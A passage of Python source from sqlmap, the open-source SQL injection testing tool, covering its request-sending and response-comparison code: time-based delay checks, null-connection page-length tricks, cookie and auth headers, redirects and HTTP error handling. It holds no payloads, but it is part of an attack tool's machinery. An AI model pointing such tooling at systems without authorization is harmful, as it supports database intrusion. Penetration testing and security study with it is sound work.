_randomizeParameter(cookie, randomParameter) get = urlencode(get, limit=True) if post and place != PLACE.POST and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) else: post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = False warnMsg = "there is considerable lagging (standard deviation: " warnMsg += "%.1f sec%s) " % (deviation, "s" if deviation > 1 else "") warnMsg += "in connection response(s). Please use as high " warnMsg += "value for --time-sec option as possible (e.g. " warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) if kb.testMode: kb.testQueryCount += 1 if conf.cj: conf.cj.clear() if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
def getPage(**kwargs): """ This method connects to the target url or proxy and returns the target url page content """ if conf.delay is not None and isinstance(conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) elif conf.cpuThrottle: cpuThrottle(conf.cpuThrottle) threadData = getCurrentThreadData() threadData.lastRequestUID += 1 # dirty hack because urllib2 just skips the other part of provided url # splitted with space char while urlencoding it in the later phase url = kwargs.get('url', conf.url).replace(" ", "%20") get = kwargs.get('get', None) post = kwargs.get('post', None) method = kwargs.get('method', None) cookie = kwargs.get('cookie', None) ua = kwargs.get('ua', None) referer = kwargs.get('referer', None) direct = kwargs.get('direct', False) multipart = kwargs.get('multipart', False) silent = kwargs.get('silent', False) raise404 = kwargs.get('raise404', True) auxHeaders = kwargs.get('auxHeaders', None) response = kwargs.get('response', False) ignoreTimeout = kwargs.get('ignoreTimeout', False) refreshing = kwargs.get('refreshing', False) page = "" cookieStr = "" requestMsg = "HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, conf.method) requestMsg += "%s" % urlparse.urlsplit(url)[2] or "/" responseMsg = "HTTP response " requestHeaders = "" responseHeaders = None logHeaders = "" try: if silent: socket.setdefaulttimeout(HTTP_SILENT_TIMEOUT) if direct: if "?" in url: url, params = url.split("?") params = urlencode(params) url = "%s?%s" % (url, params) requestMsg += "?%s" % params elif multipart: # Needed in this form because of potential circle dependency # problem (option -> update -> connect -> option) from lib.core.option import proxyHandler multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) conn = multipartOpener.open(url, multipart) page = conn.read() responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) return page elif refreshing: # Reference(s): # http://vancouver-webpages.com/META/metatags.detail.html # http://webdesign.about.com/od/metataglibraries/a/aa080300a.htm get = None post = None else: if conf.parameters.has_key(PLACE.GET) and not get: get = conf.parameters[PLACE.GET] if get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get if conf.method == HTTPMETHOD.POST: if conf.parameters.has_key(PLACE.POST) and not post: post = conf.parameters[PLACE.POST] requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Perform HTTP request headers = forgeHeaders(cookie, ua, referer) if conf.realTest: headers[HTTPHEADER.REFERER] = "%s://%s" % (conf.scheme, conf.hostname) if kb.authHeader: headers[HTTPHEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: headers[HTTPHEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader if auxHeaders: for key, item in auxHeaders.items(): headers[key] = item for key, item in headers.items(): del headers[key] headers[encodeUnicode(key, kb.pageEncoding)] = encodeUnicode(item, kb.pageEncoding) post = encodeUnicode(post, kb.pageEncoding) if method: req = MethodRequest(url, post, headers) req.set_method(method) else: req = urllib2.Request(url, post, headers) if not conf.dropSetCookie and conf.cj: for _, cookie in enumerate(conf.cj): if not cookieStr: cookieStr = "Cookie: " cookie = getUnicode(cookie) index = cookie.index(" for ") cookieStr += "%s; " % cookie[8:index] if not req.has_header(HTTPHEADER.ACCEPT_ENCODING): requestHeaders += "%s: identity\n" % HTTPHEADER.ACCEPT_ENCODING requestHeaders += "\n".join(["%s: %s" % (header, value) for header, value in req.header_items()]) if not req.has_header(HTTPHEADER.COOKIE) and cookieStr: requestHeaders += "\n%s" % cookieStr[:-2] if not req.has_header(HTTPHEADER.CONNECTION): requestHeaders += "\n%s: close" % HTTPHEADER.CONNECTION requestMsg += "\n%s" % requestHeaders if post: requestMsg += "\n\n%s" % post requestMsg += "\n" logger.log(8, requestMsg) conn = urllib2.urlopen(req) if not kb.authHeader and req.has_header(HTTPHEADER.AUTHORIZATION): kb.authHeader = req.get_header(HTTPHEADER.AUTHORIZATION) if not kb.proxyAuthHeader and req.has_header(HTTPHEADER.PROXY_AUTHORIZATION): kb.proxyAuthHeader = req.get_header(HTTPHEADER.PROXY_AUTHORIZATION) if hasattr(conn, "setcookie"): kb.redirectSetCookie = conn.setcookie if hasattr(conn, "redurl") and hasattr(conn, "redcode") and not conf.redirectHandled and not conf.realTest: msg = "sqlmap got a %d redirect to " % conn.redcode msg += "%s - What target address do you " % conn.redurl msg += "want to use from now on? %s " % conf.url msg += "(default) or provide another target address based " msg += "also on the redirection got from the application\n" while True: choice = readInput(msg, default=None) if not choice: pass else: conf.url = choice try: parseTargetUrl() return Connect.__getPageProxy(**kwargs) except sqlmapSyntaxException: continue break conf.redirectHandled = True # Reset the number of connection retries kb.retriesCount = 0 # Return response object if response: return conn, None # Get HTTP response page = conn.read() code = conn.code responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) status = getUnicode(conn.msg) if extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) and not refreshing: url = extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) if url.lower().startswith('http://'): kwargs['url'] = url else: kwargs['url'] = conf.url[:conf.url.rfind('/')+1] + url threadData.lastRedirectMsg = (threadData.lastRequestUID, page) kwargs['refreshing'] = True debugMsg = "got HTML meta refresh header" logger.debug(debugMsg) try: return Connect.__getPageProxy(**kwargs) except sqlmapSyntaxException: pass # Explicit closing of connection object if not conf.keepAlive: try: conn.fp._sock.close() conn.close() except Exception, msg: warnMsg = "problem occured during connection closing ('%s')" % msg logger.warn(warnMsg) except urllib2.HTTPError, e: page = None responseHeaders = None try: page = e.read() responseHeaders = e.info() responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None except: pass code = e.code threadData.lastHTTPError = (threadData.lastRequestUID, code) if code not in kb.httpErrorCodes: kb.httpErrorCodes[code] = 0 kb.httpErrorCodes[code] += 1 status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join(["%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in responseHeaders.items()]) logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, page if isinstance(page, unicode) else getUnicode(page))) if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s\n" % (logHeaders, page) logger.log(7, responseMsg) if e.code == 401: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise sqlmapConnectionException, errMsg elif e.code == 404 and raise404: errMsg = "page not found (%d)" % code raise sqlmapConnectionException, errMsg else: debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg) page = processResponse(page, responseHeaders) return page, responseHeaders